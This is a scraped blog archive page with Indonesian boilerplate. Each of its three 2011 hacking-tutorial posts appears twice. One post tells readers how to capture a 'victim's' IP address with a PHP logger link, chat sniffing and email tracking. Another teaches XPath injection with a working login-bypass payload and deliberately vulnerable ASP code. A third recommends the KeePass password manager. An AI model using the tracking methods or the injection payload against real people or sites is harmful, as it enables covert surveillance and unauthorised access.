Home Archives for November 2011

Selasa, 15 November 2011

How To Find IP Address of Remote Machine

    Tidak ada komentar
November 2011 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul November 2011, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Hacking, Artikel Internet, Artikel Phishing, Artikel Social Engineering, Artikel Tricks and Tips, Artikel Tutorial, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : How To Find IP Address of Remote Machine
link : How To Find IP Address of Remote Machine

Baca juga


November 2011


Hello GreenHackerz Readers...............
This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.


Before proceeding lets know something about IP address.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication. 
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

Now lets move to our moto..........

0x02-How to get IP address of remote computer or victim computer?
There are four techniques to get the IP address of remote computer or victim computer. These are as follows:
  1. Using PHP notification script.
  2. Sniffing during chat sessions.
  3. Using Blogs and Websites.
  4. Using read notify service.
Now lets go in detail one by one ....................

1.  Using PHP notification script.
Using this Notification script you can get the IP address in just seconds.
Steps of using this PHP script: 
   a) First download the PHP Notification Script and extract it.
       You can download this script by click the below download link.
       Download: Click Here
   b) Now you will get two files IP.html and index.php.
   You need to upload these two files to any free web hosting servers.
   Here is the list of some free web
       hosting servers.
       www.my3gb.com
       x10hosting.com
       www.freehostia.com
       www.ripway.com   etc.....
       you can find more on web.
   c) To upload these files you have to first sign up in the website. After uploading the file you will get a link
       of your uploading files.
       Suppose you open a new account in www.my3gb.com with the subdomain as xyz, then your IP link
       would be   http://www.xyz.my3gb.com/index.php
   d) Now you will need to send the link of index.php to the victim whose IP address you want to get.
   e) Now when the victim opens the above link nothing will open but his Ip address is written into the   
       ip.html file. So open the ip.html file to get his IP address.
   f) That’s all about this method… hope you understood it.

2. Sniffing during chat sessions.
With the help of Sniffers like wireshark etc. you can sniff the Gmail, and yahoo or any other chat sessions while we are chatting to any of your friend and extract the IP address from there. You can read about the tool wireshark  by clicking on the below link.
http://www.greenhackerz.com/2011/09/wireshark.html

3. Using Blogs and Websites.
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

4. Using read notify service.
Using read notify service is an email based service.
Steps to use Read Notify service is as follows:
   a) First open the Read Notify website : RCPT
   b) Now register on this website and then it will send you confirmation mail. Verify your account.
   c) Once your account is activated. Do the following steps to use this service:
  1. Compose your email just like you usually would in your own email or web email program.
  2. Type: .readnotify.com on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
  3. Send your email.
Some things to remember:
  • don’t send to and from the same computer.
  • if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keep typing over the top of the auto-completed one to add the .readnotify.com .
  • if you are cc-ing your email to other readers, you must add tracking to all of them.   
I hope this article is beneficial for you. Enjoy the tips and tricks. 


Hello GreenHackerz Readers...............
This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.


Before proceeding lets know something about IP address.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication. 
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

Now lets move to our moto..........

0x02-How to get IP address of remote computer or victim computer?
There are four techniques to get the IP address of remote computer or victim computer. These are as follows:
  1. Using PHP notification script.
  2. Sniffing during chat sessions.
  3. Using Blogs and Websites.
  4. Using read notify service.
Now lets go in detail one by one ....................

1.  Using PHP notification script.
Using this Notification script you can get the IP address in just seconds.
Steps of using this PHP script: 
   a) First download the PHP Notification Script and extract it.
       You can download this script by click the below download link.
       Download: Click Here
   b) Now you will get two files IP.html and index.php.
   You need to upload these two files to any free web hosting servers.
   Here is the list of some free web
       hosting servers.
       www.my3gb.com
       x10hosting.com
       www.freehostia.com
       www.ripway.com   etc.....
       you can find more on web.
   c) To upload these files you have to first sign up in the website. After uploading the file you will get a link
       of your uploading files.
       Suppose you open a new account in www.my3gb.com with the subdomain as xyz, then your IP link
       would be   http://www.xyz.my3gb.com/index.php
   d) Now you will need to send the link of index.php to the victim whose IP address you want to get.
   e) Now when the victim opens the above link nothing will open but his Ip address is written into the   
       ip.html file. So open the ip.html file to get his IP address.
   f) That’s all about this method… hope you understood it.

2. Sniffing during chat sessions.
With the help of Sniffers like wireshark etc. you can sniff the Gmail, and yahoo or any other chat sessions while we are chatting to any of your friend and extract the IP address from there. You can read about the tool wireshark  by clicking on the below link.
http://www.greenhackerz.com/2011/09/wireshark.html

3. Using Blogs and Websites.
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

4. Using read notify service.
Using read notify service is an email based service.
Steps to use Read Notify service is as follows:
   a) First open the Read Notify website : RCPT
   b) Now register on this website and then it will send you confirmation mail. Verify your account.
   c) Once your account is activated. Do the following steps to use this service:
  1. Compose your email just like you usually would in your own email or web email program.
  2. Type: .readnotify.com on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
  3. Send your email.
Some things to remember:
  • don’t send to and from the same computer.
  • if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keep typing over the top of the auto-completed one to add the .readnotify.com .
  • if you are cc-ing your email to other readers, you must add tracking to all of them.   
I hope this article is beneficial for you. Enjoy the tips and tricks. 

Rabu, 09 November 2011

XPath Injection

    Tidak ada komentar
November 2011 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul November 2011, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Hacking, Artikel Penetration Testing, Artikel SQL Injections, Artikel Tools, Artikel Tricks and Tips, Artikel Tutorial, Artikel Vulnerability Assessment, Artikel Website Hacking, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : XPath Injection
link : XPath Injection

Baca juga


November 2011

Hello GreenHackerz Readers...........
This article is about a technique used to exploit the websites. The technique named as "XPath Injection".
So lets start reading......

0x01-XPath Injection Description.

Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match.

When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses. Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.
Example:













Input the query as shown in below image:













you get the result as shown below:


















The result includes much sensitive information, now you can get a conclusion that the application use XML file to store user authentication data.

In order to analyse the injection process, we modify the sever script to output the query sentence to user’s browser. Input the following username or password:
999'] | * | user[@role='admin










Result:













The text with red frame is the XPath query sentence. 999'] | * | user[@role='admin has been injected the sentence successfully.

Now, let’s see the source code of index.asp:
<script language="javascript" runat="server">
Response.write("<html><body>");
uid=Request.form("uid");
pwd=Request.form("pwd");
Response.write("<form method=\"POST\">Username:<input name=\"uid\"
size=\"20\"/><br>Password:<input name=\"pwd\" size=\"20\"/><input type=\"submit\"
value=\"Login\"/></form>");
var xmlDom=new ActiveXObject("Microsoft.XMLDOM");
xmlDom.async="false";
xmlDom.load("/Inetpub/wwwroot/xpath/user.xml");
var auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']";
Response.write(auth);
var UserObj=xmlDom.selectNodes(auth);
if(UserObj.length>0) Response.write("<br><br>Login OK!");
else Response.write("Please Input Correct Username and Password!");
Response.write(UserObj.Xml);
for(var i=0;i<UserObj.length;i++)
{
Response.write("<xmp>");
Response.write(UserObj(i).xml);
Response.write("</xmp>");
}
Response.write("</body></html>");
</script>

user authentication file user.xml :
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
</users>

You can get the XPath query sentence as follow:
auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']"
It means that, select user nodes which uid is equal to your input uid and password is equal to your input pwd;
The actual XPath sentence is set to:
//users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin'] ,
The logic result is select all nodes, XPath injection occurred.

0x02-XPath Injection Tool
WebCruiser - Web Vulnerability Scanner
WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool!
It has a Crawler and Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc. ).
It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities:
SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also a SQL Injector,
a XPath Injector , and a Cross Site Scripting tool!
Function:
  • Crawler(Site Directories And Files);
  • Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);
  •  POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
  • GET/Post/Cookie Injection;
  • SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
  • MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
  • Administration Entrance Search;
  • Time Delay For Search Injection;
  • Auto Get Cookie From Web Browser For Authentication;
  • Report Output.
Excluding this there are also some other good Web Vulnerability Scanners tools available in market like Acunetix , Grandel Scan etc.....

Hope you like the article.
Enjoy XPath Injection

Hello GreenHackerz Readers...........
This article is about a technique used to exploit the websites. The technique named as "XPath Injection".
So lets start reading......

0x01-XPath Injection Description.

Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match.

When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses. Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.
Example:













Input the query as shown in below image:













you get the result as shown below:


















The result includes much sensitive information, now you can get a conclusion that the application use XML file to store user authentication data.

In order to analyse the injection process, we modify the sever script to output the query sentence to user’s browser. Input the following username or password:
999'] | * | user[@role='admin










Result:













The text with red frame is the XPath query sentence. 999'] | * | user[@role='admin has been injected the sentence successfully.

Now, let’s see the source code of index.asp:
<script language="javascript" runat="server">
Response.write("<html><body>");
uid=Request.form("uid");
pwd=Request.form("pwd");
Response.write("<form method=\"POST\">Username:<input name=\"uid\"
size=\"20\"/><br>Password:<input name=\"pwd\" size=\"20\"/><input type=\"submit\"
value=\"Login\"/></form>");
var xmlDom=new ActiveXObject("Microsoft.XMLDOM");
xmlDom.async="false";
xmlDom.load("/Inetpub/wwwroot/xpath/user.xml");
var auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']";
Response.write(auth);
var UserObj=xmlDom.selectNodes(auth);
if(UserObj.length>0) Response.write("<br><br>Login OK!");
else Response.write("Please Input Correct Username and Password!");
Response.write(UserObj.Xml);
for(var i=0;i<UserObj.length;i++)
{
Response.write("<xmp>");
Response.write(UserObj(i).xml);
Response.write("</xmp>");
}
Response.write("</body></html>");
</script>

user authentication file user.xml :
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user>
<firstname>Ben</firstname>
<lastname>Elmore</lastname>
<loginID>abc</loginID>
<password>test123</password>
</user>
<user>
<firstname>Shlomy</firstname>
<lastname>Gantz</lastname>
<loginID>xyz</loginID>
<password>123test</password>
</user>
</users>

You can get the XPath query sentence as follow:
auth="//users/user[loginID/text()='"+uid+"' and password/text()='"+pwd+"']"
It means that, select user nodes which uid is equal to your input uid and password is equal to your input pwd;
The actual XPath sentence is set to:
//users/user[loginID/text()='999' and password/text()='999'] | * | user[@role='admin'] ,
The logic result is select all nodes, XPath injection occurred.

0x02-XPath Injection Tool
WebCruiser - Web Vulnerability Scanner
WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool!
It has a Crawler and Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc. ).
It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities:
SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also a SQL Injector,
a XPath Injector , and a Cross Site Scripting tool!
Function:
  • Crawler(Site Directories And Files);
  • Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);
  •  POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
  • GET/Post/Cookie Injection;
  • SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
  • MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
  • Administration Entrance Search;
  • Time Delay For Search Injection;
  • Auto Get Cookie From Web Browser For Authentication;
  • Report Output.
Excluding this there are also some other good Web Vulnerability Scanners tools available in market like Acunetix , Grandel Scan etc.....

Hope you like the article.
Enjoy XPath Injection

Selasa, 01 November 2011

Keep All Passwords In Pocket !!

    Tidak ada komentar
November 2011 - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul November 2011, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Tools, Artikel Tricks and Tips, Artikel Tutorial, Artikel USB, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Keep All Passwords In Pocket !!
link : Keep All Passwords In Pocket !!

Baca juga


November 2011

Hello GreenHackerz..
Todays biggest problem for us to remember our all passwords. Because Today we need to remember many passwords. We need a password for the Windows network logon, our e-mail account, our website's FTP password, online passwords (like website member account),etc.etc.etc.. and one of the most important password for youth is facebook account's passwords.. :)


The list is endless. Also, we should use different passwords for each account. Because if we use only one password everywhere and someone gets this password so we have a problem... Even A serious problem.The Thief (Hacker) would have access to our e-mail account, website, etc...
Here is the simple solution.You can securely save all your passwords in a USB device or even in iPod and keep it in your pocket with KeePass Password Safe.
For Download Click Here


What is KeePass?
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Visit official website Click Here

How To Use

(1) Simply Download KeePass

(2) Extract it in your Pen Drive or at your desired location.

(3) Open KeePass.exe & Click on New to Create New Database for your Passwords and give strong password or make key file for your database.



(4) Now simply you can add entry


(5) Your entreis look like this..


(6) You can use autotype feature by simply press Ctrl+V if database is open it automatically fill username , Passwaord and login to your account..

Enjoy Friends with KeePass Safe..

Hello GreenHackerz..
Todays biggest problem for us to remember our all passwords. Because Today we need to remember many passwords. We need a password for the Windows network logon, our e-mail account, our website's FTP password, online passwords (like website member account),etc.etc.etc.. and one of the most important password for youth is facebook account's passwords.. :)


The list is endless. Also, we should use different passwords for each account. Because if we use only one password everywhere and someone gets this password so we have a problem... Even A serious problem.The Thief (Hacker) would have access to our e-mail account, website, etc...
Here is the simple solution.You can securely save all your passwords in a USB device or even in iPod and keep it in your pocket with KeePass Password Safe.
For Download Click Here


What is KeePass?
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Visit official website Click Here

How To Use

(1) Simply Download KeePass

(2) Extract it in your Pen Drive or at your desired location.

(3) Open KeePass.exe & Click on New to Create New Database for your Passwords and give strong password or make key file for your database.



(4) Now simply you can add entry


(5) Your entreis look like this..


(6) You can use autotype feature by simply press Ctrl+V if database is open it automatically fill username , Passwaord and login to your account..

Enjoy Friends with KeePass Safe..

Langganan: Postingan ( Atom )